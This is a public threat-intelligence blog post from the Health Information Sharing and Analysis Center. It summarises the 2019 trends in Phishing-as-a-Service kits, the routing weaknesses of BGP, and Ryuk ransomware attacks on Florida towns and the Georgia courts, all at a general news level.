H-ISAC Hacking Healthcare 7-9-19 - Health-ISAC - Health Information Sharing and Analysis Center

Adversarial #phishing kits, #BGP internet infrastructure and ransomware infecting cities and towns of all sizes.

TLP White: In this edition of Hacking Healthcare, we discuss the growth of Phishing-as-a-Service. We then check in on how decades old internet infrastructure is fueling security concerns and internet outages. Finally, we examine the worrying trend of ransomware infecting cities in towns across the United States, and what that might mean for the future.

As a reminder, this is the public version of the Hacking Healthcare blog. For additional in-depth analysis and opinion, become a member of H-ISAC and receive the TLP Amber version of this blog (available in the Member Portal.)

Welcome back to Hacking Healthcare.

Hot Links –

1. Phishing Demand Creates Supply.

While nation state hackers have traditionally always had the best tools, supporting infrastructure, and political cover to be the most harmful to those unfortunate enough to be in their crosshairs, the abilities of less well-resourced adversaries are always increasing. A reminder of this is the growing field of Phishing-as-a-Service. Where once a professional phishing scheme required a substantial amount of technical knowledge and resources—everything from a native grasp of the target’s language, professional looking website templates, the ability to host the supporting infrastructure, and innovative methods of delivery—these new services provide ready-made phishing kits. Everything from hosting infrastructure, IT support, professionally designed templates, email lists sorted by target demographic, and even methods of evading detection can be purchased on the cheap.[1]

The Cyren security blog recently posted that 87% of phishing kits now include one form of evasive techniques.[2] Their report details the six most common techniques as being HTML character encoding, content encryption, inspection blocking, URLs in attachments, content injection, and legitimate cloud hosting.[3] The result of all this has been an increase in phishing attacks by 17% in the first quarter of 2019, and an increase in organizations reporting a successful phishing attack from 30% in 2017 to 44% in 2018.[4] This phishing trend is likely to continue due to the lowered barriers of entry and the fact that phishing remains a successful attack method, despite considerable progress on defenses over the last few years.

2. Underlying Internet Infrastructure Open to Manipulation.

In the somewhat unlikely event you have never have heard of the Border Gateway Protocol (BGP), you have definitely been affected by it. To put it simply, the BGP protocol is what helps networks on the internet set the route for data transmitted across the internet’s many interconnected networks, and it operates today much the same as it has since 1994. The BGP system has scaled well and remains fairly robust as an operational protocol, but lately it has begun to show its age, particularly when it comes to security.

The BGP system is essentially based on trust. It trusts that all the various nodes and networks that provide the information to calculate the best route to send data efficiently are sending truthful updated information. When the information provided to BGP is wrong, intentionally or unintentionally, the data simply gets routed to or through unintended places. Furthermore, if the traffic being rerouted is significantly heavier than the new routes capacity it can lead to outages, or it could cause increased latency if the new path is significantly more circuitous than the ideal path.

The most common cause of these mishaps is simple human error, which is what happened when a mistake by Verizon happened to route an enormous amount of traffic through a small ISP in Pennsylvania last week.[5] However this “weakness” in the BGP system is also open to malicious hijacking. Those who are able to manipulate the system can route potentially valuable data through their preferred pathway, which is something some security researchers have accused China of doing in the past.[6]

Thankfully, there has been a growing movement to better secure the BGP system over the past few years. NIST in collaboration with DHS developed the Secure Inter-Domain Routing standards with an eye towards creating “a defense mechanism for the Border Gateway Protocol.”[7] Meanwhile, researchers at the Asia Pacific Network Information Center (APNIC) released a BGP defense system. And there have been widespread efforts to educate the organizations that implement BGP on best practices that can help secure them from malicious actors or unintended mistakes.

3. Ransomware Continues its Florida Vacation and Then Has its Day in Court (Systems).

If it feels like you just read headlines about ransomware in Florida, it’s probably because this is the third Florida town to be infected in recent weeks. Key Biscayne became the newest victim of the Ryuk ransomware after an employee unwittingly opened an infected attachment (please see article #1 above) on June 23rd.[8] The attack ultimately featured a combination of Ryuk, Emotet, and Trickbot malware working together to create a beachhead, spread laterally, and finally encrypt the files.[9]

And Florida wasn’t the only southern state to have a nasty run in with ransomware last week. Georgia, coming off a prolonged ransomware saga last year in Atlanta, has been hit again. This time it was the Administrative Office of the Georgia Courts that was infected. Last Monday the Administrative Office’s website went down as the infection became known, and the organization released a statement that none of the infected systems contain any personally identifiable information.[10] While no one has yet commented on the ransomware used, there is widespread speculation that this is another Ryuk attack.

The Ryuk malware was originally linked to the Lazerus threat group of North Korean origin, but in recent months Ryuk, along with Emotet and Trickbot, have been commonly found on the open market. This will severely dampen the likelihood that those behind the attack will be identified with a high level of confidence. While the official sum demanded are often not made public, the two other Florida Towns hit, Lake City and Rivera Beach, paid $490,000 and $600,000 in bitcoin respectively. Key Biscayne is home to a significantly smaller population than either of other two cities and it will be interesting to note if the attackers scale their demands to maximize the potential for a payout.